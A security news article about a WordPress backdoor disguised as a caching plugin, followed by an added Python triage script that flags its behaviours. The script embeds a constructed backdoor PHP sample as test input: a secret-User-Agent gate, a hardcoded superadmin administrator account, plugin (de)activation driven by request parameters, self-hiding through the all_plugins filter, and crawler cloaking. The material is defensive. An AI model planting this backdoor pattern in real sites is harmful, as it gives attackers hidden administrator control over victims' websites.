A newly identified piece of WordPress malware acts as a sophisticated backdoor: it impersonates a legitimate caching plugin and can carry out several operations on the compromised site.
Its features include modifying files, creating an administrator account, remotely activating and deactivating plugins, registering filters so that it does not appear in the list of active plugins, and a ping function that lets the operator check whether the script is still running.
WordPress Malware as Cache Plugin
Because the malicious file runs as a plugin inside the WordPress environment, it has access to the same standard WordPress functionality as any legitimate plugin, reports Defiant, the company behind the Wordfence security plugin.
One routine creates a new user account with the username ‘superadmin’ and a hardcoded password, and grants it administrator privileges. A companion function deletes the superadmin account when it is no longer required.
The sample also contains bot-detection code. Code of this kind is frequently seen in malware that serves ordinary content to some visitors while redirecting others to malicious websites or serving them malicious content.
The filter hook the malware registers is one that legitimate plugins frequently use to insert additional content into posts or pages, alter excerpt lengths, or append disclaimers to posts or pages.
The backdoor can also be used to activate and deactivate arbitrary plugins remotely, and it contains cleanup functions that remove the malicious content from the database.
Remote Invocation
Commands to the backdoor are gated on a specific User-Agent header value: requests that do not carry that string cannot invoke the backdoor’s functions, so ordinary visitors do not trigger them.
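The behaviours described above (a User-Agent-gated control branch, a hardcoded superadmin account, remote plugin activation, an `all_plugins` filter that hides the plugin from the dashboard, and crawler cloaking) are all visible in plain PHP source. The following is an added triage script, not code from the article or from Wordfence: it runs a small set of regex indicators over plugin source text and reports which of these behaviours appear. The two plugin sources embedded in it are constructed for the example; the rogue one only imitates the pattern the article describes and is not the real sample, and the indicator names, regexes, and the two-indicator threshold are the author's assumptions.

```python
import re

# Constructed sample of a rogue "cache" plugin that combines the behaviours the
# article lists. Illustrative input for the scanner only, not the real sample.
SUSPECT_PLUGIN = r'''<?php
/* Plugin Name: Super Cache Helper */
if (strpos($_SERVER['HTTP_USER_AGENT'], 'X-Cache-Agent/1.0') !== false) {
    $uid = wp_create_user('superadmin', 'P@ssw0rd-hardcoded', 'a@example.com');
    $u = new WP_User($uid);
    $u->set_role('administrator');
    if (isset($_GET['act']))   { activate_plugin($_GET['act']); }
    if (isset($_GET['deact'])) { deactivate_plugins($_GET['deact']); }
}
add_filter('all_plugins', function ($plugins) {
    unset($plugins['super-cache-helper/super-cache-helper.php']);
    return $plugins;
});
if (preg_match('/googlebot|bingbot/i', $_SERVER['HTTP_USER_AGENT'])) {
    wp_redirect('http://example.invalid/'); exit;
}
'''

# Constructed benign plugin: uses content filters for their legitimate purpose.
BENIGN_PLUGIN = r'''<?php
/* Plugin Name: Excerpt Tweaks */
add_filter('excerpt_length', function () { return 40; });
add_filter('the_content', function ($c) { return $c . '<p>Disclaimer.</p>'; });
'''

# Indicator names and patterns are assumptions for this example; each one maps
# to a behaviour the article attributes to the malware.
INDICATORS = {
    # strpos($_SERVER['HTTP_USER_AGENT'], '<literal>'): a secret UA as a key
    "user-agent gated branch":
        re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]\s*,\s*['\"]"),
    # wp_create_user / wp_insert_user called with literal login and password
    "user created with hardcoded credentials":
        re.compile(r"wp_(?:create|insert)_user\s*\(\s*['\"][^'\"]+['\"]\s*,\s*['\"][^'\"]+['\"]"),
    "administrator role assigned in code":
        re.compile(r"set_role\s*\(\s*['\"]administrator['\"]"),
    # plugin (de)activation driven directly by request parameters
    "remote plugin (de)activation from request input":
        re.compile(r"\b(?:activate_plugin|deactivate_plugins)\s*\(\s*\$_(?:GET|POST|REQUEST)\b"),
    # the all_plugins filter edits what the Plugins screen displays
    "hides itself from the plugin list":
        re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]"),
    # preg_match('/...bot.../', $_SERVER['HTTP_USER_AGENT']): crawler cloaking
    "crawler cloaking on User-Agent":
        re.compile(r"preg_match\s*\([^,]*bot[^,]*,\s*\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT", re.I),
}


def scan_plugin(source):
    """Return [(line_no, indicator)] for every line of PHP source that matches."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for label, rx in INDICATORS.items():
            if rx.search(line):
                hits.append((n, label))
    return hits


def verdict(source, threshold=2):
    """'suspicious' when at least `threshold` distinct indicators are present."""
    labels = {label for _, label in scan_plugin(source)}
    return "suspicious" if len(labels) >= threshold else "clean"


if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT_PLUGIN), ("benign", BENIGN_PLUGIN)):
        print(f"{name}: {verdict(src)}")
        for line_no, label in scan_plugin(src):
            print(f"  line {line_no}: {label}")
```

This is lexical triage, not a replacement for a real scanner: a sample that wraps the same calls in `base64_decode`/`eval` or builds function names at runtime will not match, and a single legitimate hit (some plugins do use `all_plugins` for benign reasons) is why the verdict requires two independent indicators. Because the `all_plugins` filter only changes what the dashboard shows, the file is still present on disk, so pair a source scan with an out-of-band inventory, for instance `wp plugin list --status=active` and `wp user list --role=administrator` from WP-CLI, and compare against what the admin screens display.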
“Taken together, these features provide attackers with everything they need to remotely control and monetize a victim site, at the expense of the site’s own SEO rankings and user privacy”, researchers said.
Defiant says the Wordfence malware scanner blocks the upload of this sample and many of its variations for Premium, Care, and Response users.